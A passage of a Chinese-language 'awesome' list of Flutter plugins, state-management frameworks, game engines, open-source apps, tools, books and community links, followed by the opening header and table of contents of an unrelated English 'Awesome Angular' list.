- [ARCore Plugin](https://github.com/giandifra/arcore_flutter_plugin) [201⭐] - 使用ARCore平台增强现实,由[Gian Marco Di Francesco](https://github.com/giandifra)。
## 插件
- [Pub packages](https://pub.dev/flutter/packages) - Dart Pub 仓库的包筛选器。
- [Plugins](https://github.com/flutter/plugins/tree/master/packages) - 官方 Flutter 团队的插件。
### 设备
- [WebView](https://github.com/dart-flitter/flutter_webview_plugin) [1232⭐] - 一个WebView插件, 由[Hadrien Lejard](https://twitter.com/HadrienLejard)提供。
- [Location](https://github.com/Lyokone/flutterlocation) [595⭐] - 位置服务,提供位置,以及连续位置的回调,由 [Lyokone](https://github.com/Lyokone)提供。
- [Battery](https://pub.dartlang.org/packages/battery) - 提供访问有关电池的各种信息。
- [Proximity Sensor Plugin](https://pub.dartlang.org/packages/proximity_plugin) - 提供访问接近传感器也叫近距离传感器的能力,比如手机靠近脸后屏蔽操作之类的,由 [Manoj NB](https://github.com/Samaritan1011001)提供。
- [Geolocation](https://github.com/loup-v/geolocation) [196⭐] - 功能齐全的地理定位插件:当前位置,位置更新,地理编码,地点等,由 [Loup](http://intheloup.io)提供。
- [Local Notifications](https://github.com/MaikuB/flutter_local_notifications) [1203⭐] - 用于显示本地通知的插件,由 [Michael Bui](https://github.com/MaikuB)提供。
- [Device Calendar](https://github.com/builttoroam/flutter_plugins/tree/develop/device_calendar) - 提供修改用户日历能力的插件,由[Built to Roam](http://builttoroam.com)提供。
- [Badger](https://github.com/g123k/flutter_app_badger) [175⭐] - 提供更新APP启动图标上的小红点能力的插件,由 [Edouard Marquez](https://twitter.com/g123k)提供。
- [UDID](https://github.com/GigaDroid/flutter_udid) [135⭐] - 用于在Android/iOS设备上获取一个持久的 UDID,即使重新安装App,由 [Leon Kukuk](https://kukuk.me)提供。
- [Downloader](https://github.com/hnvn/flutter_downloader) [472⭐] - 下载器,创建和管理下载任务,由 [HungHD](https://github.com/hnvn)提供。
- [InAppBrowser](https://github.com/pichillilorenzo/flutter_inappbrowser) [1002⭐] - 添加内联WebView小部件或打开应用程序内浏览器窗口,由 [Lorenzo Pichilli](https://github.com/pichillilorenzo)提供。
- [AppAvailability](https://github.com/pichillilorenzo/flutter_appavailability) [57⭐] - 列出,启动并检查已安装的应用,由 [Lorenzo Pichilli](https://github.com/pichillilorenzo)提供。
- [Aeyrium Sensor](https://github.com/aeyrium/aeyrium-sensor) [49⭐] - 一个插件,可以轻松访问Android和iOS设备上的Pitch and Roll, [Diego Velásquez](https://github.com/aeyrium)提供。
- [File Picker](https://github.com/miguelpruivo/plugins_flutter_file_picker) [392⭐] - 本机文件浏览器加载,支持绝对文件路径,由[Miguel Ruivo](https://github.com/miguelpruivo)。
- [VPN](https://github.com/X-dea/Flutter_VPN)<!--stargazers:X-dea/Flutter_VPN--> - 访问 VPN 服务,由[Jason C.H](https://github.com/ctrysbita)。
- [Geolocator](https://github.com/baseflow/flutter-geolocator)<!--stargazers:baseflow/flutter-geolocator--> - Flutter地理位置插件,可轻松访问特定于平台的位置服务,由[Baseflow](https://baseflow.com)。
- [Permission Handler](https://github.com/baseflow/flutter-permission-handler)<!--stargazers:baseflow/flutter-permission-handler--> - Flutter权限插件,提供跨平台(iOS,Android)API来请求和检查权限,由[Baseflow](https://baseflow.com)。
### 扫码器
- [QR Code Reader](https://github.com/villela/flutter_qrcode_reader) [197⭐] - QR 扫描插件,由[Matheus Villela](https://github.com/villela)提供。
- [Fast QR Reader View](https://github.com/facundomedica/fast_qr_reader_view) [236⭐] - 快速的QR扫码插件,由 [Facundo Medica](https://github.com/facundomedica)提供。
### 蓝牙 / NFC / 信号灯
- [Blue](https://github.com/pauldemarco/flutter_blue) [1423⭐] - FlutterBlue是Flutter的蓝牙插件,由[Paul DeMarco](https://github.com/pauldemarco)提供。
- [Beacons](https://github.com/loup-v/beacons) [64⭐] - Flutter beacons 插件,由 [Loup](http://intheloup.io)提供。
- [NFC Reader](https://github.com/matteocrippa/flutter-nfc-reader) [203⭐] - NFC 读取器,由[Matteo Crippa](https://github.com/matteocrippa)。
- [Beacon broadcast](https://github.com/pszklarska/beacon_broadcast) [54⭐] - 将手机变成信标的库,由[Paulina Szklarska](https://github.com/pszklarska/)。
- [Reactive Ble](https://github.com/PhilipsHue/flutter_reactive_ble) [84⭐] - 处理多个设备的BLE操作,由[Philips Hue](https://github.com/PhilipsHue)。
- [NFC Manager](https://github.com/okadan/flutter-nfc-manager) [29⭐] - 适用于iOS和Android的通用NFC插件,由[Naoki Okada](https://github.com/okadan)。
### 存储
- [Sqflite](https://github.com/tekartik/sqflite) [2289⭐] - SQLite Flutter 插件,由 [Alexandre Roux](https://www.linkedin.com/in/alextekartik/) 开发。
- [Moor](https://github.com/simolus3/moor) - Moor 是一个易于使用、反应式、类型安全的 Dart 和 Flutter 持久化库,由 [Simon Binder](https://github.com/simolus3) 开发。
### 服务
- [Dialogflow](https://github.com/VictorRancesCode/flutter_dialogflow) [186⭐] - 用于与 Dialogflow 轻松集成的插件,由 [Victor Rances](https://github.com/VictorRancesCode/) 开发。
- [Intercom](https://pub.dev/packages/intercom) [23⭐] - 将 Intercom 集成到你的应用程序中,由 [Maido Kaara](https://github.com/v3rm0n) 开发。
- [OneSignal](https://github.com/OneSignal/OneSignal-Flutter-SDK) [497⭐] - 推送通知服务,由 [OneSignal](https://github.com/OneSignal) 开发。
- [Place Dialog](https://github.com/pinkfish/flutter_places_dialog) [45⭐] - 返回应用程序的地点的地点选择对话框,由 [David Bennett](https://github.com/pinkfish) 开发。
- [App Rating](https://github.com/AppleEducate/app_review) [30⭐] - 请求和撰写应用商店和 Google Play 的评论,由 [Rody Davis](http://appleeducate.com) 开发。
## 框架
### 状态管理
#### Standard
- [Bloc](https://github.com/felangel/bloc) [8181⭐] - 一套帮助实现 BLoC 设计模式的包集合,由 [Felix Angelov](https://github.com/felangel) 开发。
- [MobX](https://github.com/mobxjs/mobx.dart) [2037⭐] - 使用透明功能响应式编程(TFRP)来增强应用程序中的状态管理。从 Js/React 领域移植的 MobX。
- [Provider](https://github.com/rrousselGit/provider) [3974⭐] - Flutter 的状态管理库,由 [Remi Rousselet](https://github.com/rrousselGit) 开发。
- [RiverPod](https://github.com/rrousselGit/river_pod) [2214⭐] - Provider 的不同实现,由 [Remi Rousselet](https://github.com/rrousselGit) 开发。
- [GetX](https://github.com/jonataslaw/getx) <!--jonataslaw/getx--> - 无需上下文的状态管理和导航,由 [Jonny Borges](https://github.com/jonataslaw) 开发。
- [Binder](https://github.com/letsar/binder) [167⭐] - 一种轻量而强大的将应用程序状态与业务逻辑绑定的方式,由 [Romain Rastel](https://github.com/letsar) 开发。
### Redux / ELM / 依赖注入
- [Built redux](https://github.com/davidmarne/flutter_built_redux) [81⭐] - 自动订阅 Redux Store 的包。基于 Built 模式,由 [David Marne](https://github.com/davidmarne) 开发。
- [Redux.dart](https://github.com/johnpryan/redux.dart) [486⭐] - Redux 在 Dart 中的移植版本,包括一系列的中间件、Flutter 集成和时间旅行开发工具,由 [John Ryan](https://github.com/johnpryan) 和 [Brian Egan](https://gitlab.com/users/brianegan/projects) 开发。
- [Redux](https://github.com/brianegan/flutter_redux) [1522⭐] - 与 [redux.dart](https://github.com/johnpryan/redux.dart) 配合使用的工具,可以轻松使用 Redux Store 构建 Widgets。
- [Inject](https://github.com/google/inject.dart) [847⭐] - 编译时依赖注入,由 Google 开发。
- [Flux](https://github.com/google/flutter_flux) [368⭐] - Google 的 Flux 框架的实现。
- [Fish](https://github.com/alibaba/fish-redux) [7214⭐] - 阿里巴巴的 Redux 实现。
- [Async Redux](https://pub.dev/packages/async_redux) [199⭐] - 无需样板代码的 Redux。支持同步和异步的 reducer,由 [Marcelo Glasberg](https://github.com/marcglasberg/) 开发。
### Widgets
- [Hooks](https://github.com/rrousselGit/flutter_hooks) [1366⭐] - 小部件之间的高级代码共享,由[Remi Rousselet](https://github.com/rrousselGit)。
- [Functional widget](https://github.com/rrousselGit/functional_widget) [321⭐] - 代码生成器将小部件作为带有注释的函数编写,由[Remi Rousselet](https://github.com/rrousselGit)。
### 数据
- [Graphql](https://github.com/zino-app/graphql-flutter) [2796⭐] - GraphQL 规范的实现,由 [Zino App B.V.](https://github.com/zino-app) 开发。
- [GeoFlutterFire](https://github.com/DarshanGowda0/GeoFlutterFire) [244⭐] - Flutter 的 GeoFirestore 实现,由 [Darshan Gowda](https://darshann.me/) 开发。
- [Ferry](https://github.com/gql-dart/ferry) [334⭐] - 强大且可扩展的 GraphQL 客户端,由 [Sat Mandir Khalsa](https://github.com/smkhalsa) 开发。
### 后端
- [Dynamic Widget](https://github.com/dengyin2000/dynamic_widget) [1100⭐] - 使用 JSON 构建动态 UI,JSON 格式与 Flutter Widget 代码非常相似,由 [Denny Deng](https://github.com/dengyin2000) 开发。
- [NETCoreSync](https://github.com/aldycool/NETCoreSync) - 面向多个客户端的集中式数据库同步框架,基于 [Moor](https://github.com/simolus3/moor) 库,由 [Aldy J](https://github.com/aldycool) 开发。
- [Parse for Flutter](https://github.com/parse-community/Parse-SDK-Flutter/tree/master/packages/flutter) [394⭐] - 开源的后端框架,由 [ParsePlatform](https://parseplatform.org/) 开发。
### 动画
- [Sequence Animation](https://github.com/Norbert515/flutter_sequence_animation) [338⭐] - 由 [Norbert Kozsir](https://twitter.com/norbertkozsir) 开发的复合交错动画。
- [SpinKit](https://github.com/jogboms/flutter_spinkit) [2405⭐] - 由 [Jeremiah Ogbomo](https://twitter.com/jogboms) 开发的动画加载指示器。
- [Villains](https://github.com/Norbert515/flutter_villains) [328⭐] - 由 [Norbert Kozsir](https://twitter.com/norbertkozsir) 开发的页面过渡动画。
- [AnimatedTextKit](https://github.com/aagarwal1012/Animated-Text-Kit) [1268⭐] - 由 [Ayush Agarwal](https://github.com/aagarwal1012/) 开发的一组酷炫文本动画。
- [Drawing Animation](https://github.com/biocarl/drawing_animation) [384⭐] - 基于 SVG 路径数据创建绘制线条动画,由 [Carl Hauck](https://twitter.com/cahaucks) 开发。
- [Simple Animations](https://github.com/felixblaschke/simple_animations) - 由 [Felix Blaschke](https://github.com/felixblaschke) 开发,轻松创建令人赞叹的自定义动画。
- [Flutter-animation-set](https://github.com/efoxTeam/flutter-animation-set) [264⭐] - 由 [efoxTeam](https://github.com/efoxTeam) 开发,轻松构建动画集合。
- [Staggered Animations](https://github.com/mobiten/flutter_staggered_animations) [977⭐] - 由 [mobiten](https://mobiten.com/) 开发,轻松为您的 ListView、GridView、Column 和 Row 添加交错动画。
- [Animate Do](https://pub.dev/packages/animate_do) - 受 Animate.css 启发的动画包,由 [Fernando Herrera](https://twitter.com/Fernando_Her85) 开发。
- [Funvas](https://github.com/creativecreatorormaybenot/funvas) [361⭐] - 由 [creativecreatorormaybenot](https://twitter.com/creativemaybeno) 开发,创建有趣的基于时间的画布动画。
### Web
- [响应式框架](https://github.com/Codelessly/ResponsiveFramework) [702⭐] - 自动适应不同屏幕尺寸的用户界面。简化响应式设计,由 [Codelessly](https://codelessly.com) 开发。
## 实验性
本节包含采用实验性或非常规性方法的库。
- [styled_widget](https://github.com/ReinBentdal/styled_widget) [671⭐] - 通过使用方法定义小部件来简化小部件树结构,由[Rein Gundersen Bentdal](https://github.com/ReinBentdal)。
## 引擎
### 渲染
- [Graphx](https://github.com/roipeker/graphx) [293⭐] - 受 Flash 启发,使绘图和动画变得极其简单,由 [Roi Peker](https://github.com/roipeker) 开发。
### 游戏引擎
- [Flame](https://github.com/luanpotter/flame) [5173⭐] - 极简主义的游戏引擎,由 [Luan Nico](https://github.com/luanpotter)提供。
- [SpriteWidget](https://github.com/spritewidget/spritewidget) [1186⭐] - 用于构建复杂,高性能动画和2D游戏的工具包,由[Viktor Lidholt](https://github.com/vlidholt)提供。
### 开源游戏
- [Flip](https://github.com/RedBrogdon/flutterflip) [201⭐] - Reversi 游戏,由 [Andrew Brogdon](https://github.com/RedBrogdon) 开发。
- [2048](https://github.com/anuranBarman/2048) [205⭐] - 2048 游戏,由 [Anuran Barman](https://github.com/anuranBarman) 开发。
- [TRex](https://github.com/renancaraujo/trex-flame) [316⭐] - 著名 Chrome Trex 游戏的移植版,由 [Renan C. Araújo](https://github.com/renancaraujo) 开发。
- [Crush](https://github.com/boeledi/flutter_crush) [409⭐] - 如 Candy Crush、Bejeweled 一样构建 Math-3 游戏的示例,由 [Didier Boelens](https://didierboelens.com) 开发。
- [Slide Puzzle](https://github.com/kevmoo/slide_puzzle) [152⭐] - 经典的滑块(15)拼图游戏,由 [Kevin Moore](https://github.com/kevmoo) 开发。
- [Tetris](https://github.com/boyan01/flutter-tetris) [1280⭐] - 俄罗斯方块游戏,由 [YangBin](https://github.com/boyan01) 开发。
- [Party Charades](https://github.com/vintage/party_flutter) [165⭐] - 派对字谜游戏,由 [Kamil Rykowski](https://github.com/vintage) 开发。
- [Ghost Rigger](https://github.com/Float-like-a-dash-Sting-like-a-dart/GhostRigger) [159⭐] - 像素朋克风格的拼图游戏,由 [Iain Smith](https://github.com/b099l3) 和 [Julio Ernesto Rodríguez Cabañas](https://github.com/ernestoyaquello) 开发。
- [Space Empires](https://github.com/satyamx64/space_empires) [32⭐] - 一款 4X 太空主题的策略游戏,由 [Satyam Sharma](https://github.com/satyamx64) 开发。
#### 游戏引擎资源
- [Awesome Flame](https://github.com/flame-engine/awesome-flame)<!--stargazers:flame-engine/awesome-flame--> - Flame 游戏引擎的精选列表,包含最佳 Flame 游戏、项目、库、工具、教程、文章等,由 [Flame Engine](https://github.com/flame-engine) 维护。
## 开源App
### 高级
- [History Of Everything](https://github.com/2d-inc/HistoryOfEverything) [5887⭐] - 人类历史的动画垂直时间线,由 [2D, Inc](https://www.2dimensions.com/) 开发。
- [Developer Quest](https://github.com/2d-inc/developer_quest) [2917⭐] - 成为技术领导者,消灭虫子,由 [2D, Inc](https://www.2dimensions.com/) 开发。
- [AppFlowy](https://github.com/AppFlowy-IO/appflowy) [12156⭐] - 开源的 Notion 替代方案。你对数据和自定义有绝对控制。使用 Flutter 和 Rust 构建,由 [AppFlowy 团队](https://www.appflowy.io/) 开发。
### Top
- [Flutter Team Samples](https://github.com/flutter/samples) [8245⭐] - 示例集合(包括地图,json,Material和Cupertino) 由 [Flutter team](https://github.com/orgs/flutter/people)提供。
- [Flutter Common Widgets](https://github.com/alibaba/flutter-common-widgets-app) [22040⭐] - 收集中文官方小部件演示和文档,以帮助开发人员快速学习,由[Alibaba Auction Frontend Team](https://github.com/alibaba-paimai-frontend)。
- [Meme Chat](https://github.com/efortuna/memechat) [471⭐] - 使用Flutter开发的的聊天App,该App用到了Firebase,Google登录,摄像头等。
- [Flitter](https://github.com/dart-flitter/flitter) [178⭐] - 使用Flutter开发的Gitter 客户端,该App用到了Redux 与 Jaguar,由[Hadrien Lejard](https://twitter.com/HadrienLejard) 和 [Kevin Segaud](https://twitter.com/kevin_segaud)提供。
- [Lime](https://github.com/fablue/lime-flutter) [335⭐] - 使用Flutter开发的Lime客户端。
- [Planets](https://github.com/sergiandreplace/flutter_planets_tutorial) [655] - Flutter Planets app及教程,由[Sergi Martínez](http://sergiandreplace.com)提供。
- [NewsBuzz](https://github.com/theankurkedia/NewsBuzz) [444⭐] - 使用News API在Flutter中创建的新闻App用于获取实时数据,Firebase用作后端和身份验证器,由 [Ankur Kedia](https://github.com/theankurkedia)提供。
- [DroidKaigi2018-flutter](https://github.com/konifar/droidkaigi2018-flutter) [485⭐] - DroidKaigi 2018东京的非官方会议App ,由[konifar](https://github.com/konifar)提供。
- [Music Player](https://github.com/iampawan/Flutter-Music-Player) [1112⭐] - 全功能音乐播放器App,由[Pawan Kumar](https://about.me/imthepk)提供。
- [WhatTodo](https://github.com/burhanrashid52/WhatTodo) [761⭐] - Flutter实现的的简单Todo App,可以每天跟踪您的任务,由[Burhanuddin Rashid](https://about.me/burhanrashid52)提供。
- [FlutterGram](https://github.com/mdanics/fluttergram) [1454⭐] - 使用Firebase / Firestore实现Flutter版的Instagram App,由[MDanics](https://github.com/mdanics)提供。
- [BookSearch](https://github.com/Norbert515/BookSearch) [419⭐] - Flutter实现的带有搜索功能的电子书,由[Norbert515](https://github.com/Norbert515)提供。
- [Cinematic](https://github.com/aaronoe/FlutterCinematic) [757⭐] - Flutter实现的Cinematic 客户端,由[Aaron Oertel](https://github.com/aaronoe)提供。
- [Beer-Me-Up](https://github.com/benoitletondor/Beer-Me-Up) [377⭐] - Flutter实现啤酒日志App,由[Benoit Letondor](https://github.com/benoitletondor)提供。
- [Trace](https://github.com/trentpiercy/trace) [573⭐] - 现代而强大的加密投资组合和市场资源管理器,由 [Trent Piercy](https://github.com/trentpiercy)提供。
- [Taskist](https://github.com/huextrat/Taskist) [549⭐] - Taskist是任务管理的ToDo List App,由 [Hugo EXTRAT](https://github.com/huextrat)提供。
- [Tourism](https://github.com/bluemix/tourism-demo) [213⭐] - 基于redux w / animations&i18n的旅游应用程序,由 [blueMix](https://github.com/bluemix/tourism-demo)提供。
- [Trinity Orientation @ Univ Toronto](https://github.com/matthewtory/trinity-orientation-2018) [454⭐] - 多伦多大学迎新周,由 [Matthew Tory](https://github.com/matthewtory)提供。
- [Transform Widget](https://github.com/DrPaulT/flutter-engine-test) - 图像小部件作为3D游戏引擎精灵,由[Paul Thomas](https://github.com/DrPaulT)提供。
- [Deer](https://github.com/aleksanderwozniak/deer) [238⭐] - 使用BLoC模式构建的简约Todo Planner,由[Aleksander Woźniak](https://github.com/aleksanderwozniak)提供。
- [TailorMade](https://github.com/jogboms/tailor_made) [210⭐] - 结合使用ReBLoC和Firebase Cloud Store和功能来管理时装设计师的日常工作,由[Jeremiah Ogbomo](https://twitter.com/jogboms)。
- [Instory](https://github.com/InvertedX/instory) [173⭐] - 具有精美UI的Instagram故事下载器,由[Sarath](https://twitter.com/_sarath_kumar)提供。
- [Spacex-Go](https://github.com/jesusrp98/spacex-go) [492⭐] - 简单但功能强大的开源SpaceX启动跟踪器,由[jesusrp98](https://twitter.com/jesusrp98)提供。
- [Superhero Interaction](https://github.com/pinkeshdarji/SuperHeroInteraction) [208⭐] - 酷超级英雄互动动画,由[Pinkesh Darji](https://github.com/pinkeshdarji)提供。
- [Reply](https://github.com/flschweiger/reply) [469⭐] - “答复”材料设计案例研究,由[Frederik Schweiger](https://github.com/flschweiger)提供。
- [Enigma](https://github.com/AmitJoki/Enigma) - 端到端加密的隐私聊天,由[AmitJoki](https://github.com/AmitJoki)。
- [Chillify](https://github.com/KarimElghamry/chillify) - 使用Provider和Bloc模式制作的精美音乐应用,由[Karim Elghamry](https://github.com/KarimElghamry)提供。
- [Pokedex](https://github.com/scitbiz/flutter_pokedex) - Pokedex应用程序具有精美的用户界面和流畅的动画,由[Hung Pham](https://github.com/scitbiz)提供。
- [Timy Messenger](https://github.com/janoodleFTW/timy-messenger) [1504⭐] - 群发消息应用程序,重点是组织活动,由[Miguel Beltran](https://github.com/miquelbeltran) 与 [Franz Heinfling](https://github.com/fheinfling)提供。
- [GitJournal](https://github.com/GitJournal/GitJournal) [507⭐] - 在Git Repo中记录数据,由[Vishesh Handa](https://github.com/vHanda)提供。
- [AuthPass](https://github.com/authpass/authpass) [372⭐] - 与手机和台式机兼容的Keepass密码管理器,由[hpoul](https://github.com/hpoul)提供。
- [Fwitter](https://github.com/TheAlphamerc/flutter_twitter_clone) [852⭐] - 使用Firebase解决方案的完整Twitter克隆,由[Sonu Sharma](https://github.com/TheAlphamerc)提供。
- [Harpy](https://github.com/robertodoering/harpy) [825⭐] - 由[Roberto Doering](https://github.com/robertodoering)开发的功能丰富的Twitter客户端。
## 实用工具
- [json-to-dart](https://www.devio.org/io/tools/json-to-dart/) - JSON在线转Dart工具,支持空安全![ new](http://www.devio.org/img/ico/ico_new.gif)。
- [Launcher Icons](https://github.com/franzsilva/flutter_launcher_icons) - 由 [Mark O'Sullivan](https://github.com/MarkOSullivan94) 和 [Franz Silva](https://github.com/franzsilva) 轻松生成应用程序的启动器图标。
- [FlutterIcon](http://fluttericon.com/) [310⭐] - 由 [Mike Hoolehan](https://github.com/ilikerobots) 创建的图标集生成器。
- [FVM](https://github.com/leoafarias/fvm) [2233⭐] - Flutter版本管理:一个简单的命令行工具,用于管理Flutter SDK的版本。
- [Environment Configuration](https://github.com/TatsuUkraine/dart_environment_config) [86⭐] - CLI工具,用于为应用程序环境生成`.env`配置文件,由 [TatsuUkraine](https://github.com/TatsuUkraine) 创建。
- [Flutter Flavorizr](https://github.com/AngeloAvv/flutter_flavorizr) [160⭐] - CLI实用工具,可在不到3分钟的时间内轻松为Android和iOS生成不同的应用程序风格,由 [Angelo Cassano](https://github.com/AngeloAvv) 创建。
- [Fontify](https://github.com/westracer/fontify) [77⭐] - CLI工具,用于将SVG图标转换为OTF字体并生成适用于Flutter的类,由 [Igor Kharakhordin](https://github.com/westracer) 创建。
- [FlutterGen](https://github.com/FlutterGen/flutter_gen) [791⭐] - 用于生成图像、字体、颜色等的资产代码的生成器,摆脱基于字符串的API。
- [Very Good Cli](https://github.com/VeryGoodOpenSource/very_good_cli) [1135⭐] - Dart的非常好的命令行界面工具,由 [Very Good Ventures](https://github.com/VeryGoodOpenSource) 创建。
- [Flutter Sidekick](https://github.com/leoafarias/sidekick) [544⭐] - 简单的应用程序,使Flutter开发更加愉快,由 [Leo Farias](https://github.com/leoafarias) 创建。
- [Dart Code Metrics](https://github.com/dart-code-checker/dart-code-metrics) [430⭐] - 附加的代码度量标准检查工具,检查代码度量、反模式,并为Dart分析器提供额外的规则,由 [Dart Code Checker团队](https://github.com/dart-code-checker) 创建。
### VSCode
- [Awesome Snippets](https://marketplace.visualstudio.com/items?itemName=Nash.awesome-flutter-snippets) - 常用类和方法的集合,由[Nash](https://twitter.com/Nash0x7E2)提供。
- [Flutter Files](https://marketplace.visualstudio.com/items?itemName=gornivv.vscode-flutter-files) - 通过上下文菜单快速生成BLoC模板文件,由[Gorniv](https://github.com/gorniv)提供。
- [Flutter Intl](https://marketplace.visualstudio.com/items?itemName=localizely.flutter-intl) - i18n从arb文件绑定,由[Localizely](https://twitter.com/localizely)提供。
### IntelliJ / Android Studio
- [Enhancement_Suite](https://github.com/marius-h/flutter_enhancement_suite) [118⭐] - 搜索pub.dev库,更新版本,Bloc,Snippet等,由[Marius Höfler](https://github.com/marius-h)提供。
- [Flutter Intl](https://plugins.jetbrains.com/plugin/13666-flutter-intl) - 从Arb文件进行18n绑定,由[Localizely](https://twitter.com/localizely)提供。
### 桌面应用
- [Desktop Embedding](https://github.com/google/flutter-desktop-embedding) [6950⭐] - Google提供的Flutter嵌入API的桌面实现。
- [Golang Desktop Embedder](https://github.com/go-flutter-desktop/go-flutter) [5083⭐] - Golang桌面应用的Flutter嵌入器,由[Pierre Champion](https://github.com/pchampio)开发。
- [Native Shell](https://github.com/nativeshell/nativeshell) [372⭐] - Flutter的实验性嵌入器,由[Matej Knopp](https://twitter.com/matejknopp)开发。
- [Rust Desktop Embedder](https://github.com/gliheng/flutter-rs) [1871⭐] - Rust桌面应用的Flutter嵌入器,由[juju](https://github.com/gliheng)开发。
- [bitsdojo_window](https://github.com/bitsdojo/bitsdojo_window) <!--bitsdojo/bitsdojo_window--> - 自定义Windows窗口的绘制样式,由[BitsDojo](https://github.com/bitsdojo)开发。
- [Raspberry Pi Embedder](https://github.com/ardera/flutter-pi) [747⭐] - 适用于树莓派的轻量级嵌入器,由[Hannes Winkler](https://github.com/ardera)开发。
- [Fluent UI](https://github.com/bdlukaa/fluent_ui) [566⭐] - Microsoft的Fluent Design System在Flutter中的实现,由[Bruno D'Luka](https://twitter.com/bdlukaadev)开发。
- [MacOS UI](https://github.com/GroovinChip/macos_ui) [492⭐] - 实现当前MacOS设计语言的小部件和主题,由[Groovin Chip](https://twitter.com/GroovinChip)开发。
- [Ubuntu Yaru](https://github.com/ubuntu/yaru.dart) [134⭐] - Ubuntu桌面的独特外观和风格,由[Ubuntu](https://github.com/ubuntu)开发。
- [Awesome Flutter Desktop](https://github.com/leanflutter/awesome-flutter-desktop) [516⭐] - 与Flutter桌面相关的精选资源列表,由[LeanFlutter](https://github.com/leanflutter)维护。
## 书籍
### 适应于初学者
- [Beginning App Development](https://www.amazon.com/Beginning-App-Development-Flutter-Cross-Platform/dp/1484251806) -,由[Rap Payne](https://github.com/rapPayne)提供。
- [Beginning Flutter](https://www.amazon.com/Beginning-Flutter-Hands-Guide-Development/dp/1119550823) -,由[Marco Napoli](https://github.com/JediPixels)提供。
- [Flutter for Beginners](https://www.amazon.com/Flutter-Beginners-introductory-cross-platform-applications/dp/1788996089) -,由[Alessandro Biessek](https://github.com/biessek)提供。
- [Flutter in Action](https://www.manning.com/books/flutter-in-action?a_aid=flutterinaction&a_bid=d08c3247) - 完整的 Flutter 和 Dart 资源。
- [Learn Google Flutter Fast](https://www.amazon.com/Learn-Google-Flutter-Fast-Example/dp/1092297375) -,由[Mark Clow](https://github.com/markclow)提供。
### Cookbooks
- [Practical Flutter](https://www.amazon.com/Practical-Flutter-Improve-Development-Open-Source/dp/1484249712) -,由[Frank Zammetti](https://github.com/fzammetti)提供。
## 博客
### 中文
- [Flutter 中文博客](https://www.devio.org/tags/#Flutter) - 由[CrazyCodeBoy](http://www.imooc.com/t/4951150)倾力打造。
### 英语
- [It's all widgets! Flutter podcast](https://open.spotify.com/show/2qJVeu47e2eAum4j7lxXXv?si=d26QVJQsSRyRHeybfL_01Q) - 由[Hillel Coren](https://twitter.com/hillelcoren)主持。
### 葡萄牙语
- [Universo Flutter](https://open.spotify.com/show/4AlxqGkkrqe0mfIx3Mi7Xt?si=1eC0a22MR1OkEAT7HErT-A) - 由[Matias de Andrea](http://deandreamatias.com/)主持。
### 西班牙语
- [Código Flutter](https://open.spotify.com/show/3QUTYR6jspNxHK8akJFxYf?si=MZtgjIMyTi6-WgN9Go6vZQ) - 由[Guillermo García](https://guillermogarcia.es/)主持。
### 俄语
- [Flutter Dev Podcast](https://open.spotify.com/show/5qc1VFD4pkJlUYZBVTOFCI?si=OWn7VCELRO2QV03Gi2u8nA&nd=1) - 由[Eugene Saturov](https://twitter.com/saturovv)主持。
## 附加
- [It's All Widgets!](https://itsallwidgets.com) - 由[Hillel Coren](https://twitter.com/hillelcoren),[Thomas Burkhart](https://twitter.com/ThomasBurkhartB),[Simon Lightfoot](https://twitter.com/devangelslondon)和[Scott Stoll](https://twitter.com/scottstoll2017)共同维护的已发布应用程序的开放列表。
- [Awesome Flutter Linux](https://github.com/jpnurmi/awesome-flutter-linux) - 由[J-P Nurmi](https://twitter.com/jpnurmi)维护的精选的专为Linux的Flutter软件包和项目的列表。
### 好玩的
- [The One](https://www.youtube.com/watch?v=sIIgtClYq0s) [381👍] - 一个有趣的视频。
### 硬件
- [Matrix2](https://github.com/bus710/matrix2) - 由[bus710](https://github.com/bus710)开发的Sense Hat LED矩阵控制游戏。
### 指南和面试
- [面试问题](https://github.com/whatsupcoders/Flutter-Interview-Questions) - 一份有帮助的问题列表,可以用来面试潜在候选人,由[Whatsupcoders](https://github.com/whatsupcoders/Whatsupcoders-flutter)提供。
- [国际化Flutter入门套件](https://medium.com/flutter-community/intl-flutter-starter-kit-18415e739fb6) - 由专家编写的指南,由[Beyza Sunay Guler](https://twitter.com/BeyzaSunayGler1)和[Nawal Alhamwi](https://twitter.com/__nawalhmw)提供。
## 社区
### 演讲材料
- [Logo](https://drive.google.com/drive/folders/1GDGdQ0ghrxTNTx6aZLT41eV5sPZvV7bU) - 贴纸印象的logo。
### 交流
- [Gitter](https://gitter.im/flutter/flutter) - 一个不错的Flutter交流渠道。
- [r/FlutterDev Subreddit](https://www.reddit.com/r/FlutterDev/) - Reddit社区,由 [u/JaapVermeulen](https://www.reddit.com/user/JaapVermeulen)提供。
- [Discord](https://discord.gg/N7Yshp4) - Discord服务器讨论并获得帮助,由[Pritykin]提供。
- [Dev Discord](https://discord.gg/N7Yshp4) - Discord服务器讨论并获得帮助,由 [Pritykin](https://twitter.com/AndrewPritykin)提供。
- [Flutter Community](https://github.com/fluttercommunity) - Flutter社区组件中心。
- [OpenFlutter](https://github.com/OpenFlutter) - Make it easier 让Flutter更简单.
- [Hashnode](https://hashnode.com/n/flutter) - 阅读和撰写帖子,参与讨论或提问。
#### 其他
- [Flutter活动](https://flutterevents.com) - 由[@hillelcoren](https://twitter.com/hillelcoren)创建的Flutter活动列表。
- [FlutterX](https://flutterx.com) - 由[Hillel Coren](https://twitter.com/hillelcoren)创建的可搜索资源列表。
## MIT Licensed
|
<p align="center">
<a href="https://patrickjs.com" target="_blank">
<img src="/media/awesome-angular.png" alt="Awesome Angular" />
</a>
</p>
# Awesome Angular [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) [![Build Status](https://travis-ci.org/PatrickJS/awesome-angular.svg?branch=gh-pages)](https://travis-ci.org/PatrickJS/awesome-angular)
Awesome list of [Angular](https://angular.io/) seed repos, starters, boilerplates, examples, tutorials, components, modules, videos, and anything else in the Angular ecosystem. [View as github page.](https://PatrickJS.github.io/awesome-angular/)
> If you're looking for AngularJS (version 1.x.x) please visit https://github.com/gianarb/awesome-angularjs
##### Current Angular version:
[![npm version](https://badge.fury.io/js/%40angular%2Fcore.svg)](https://www.npmjs.com/~angular)
Table of contents:
* [Angular](#angular)
* [Official Resources](#official-resources)
* [Community](#community)
* [Experts on Twitter](#experts-on-twitter)
* [Server-Side Rendering](#server-side-rendering)
* [Material Design](#material-design)
* [Cheatsheet](#cheatsheet)
* [Angular CLI](#angular-cli)
* [Webpack](#webpack)
* [Series](#series)
* [Video Tutorials](#video-tutorials)
* [Style Guides](#style-guides)
* [Angular Connect](#angular-connect)
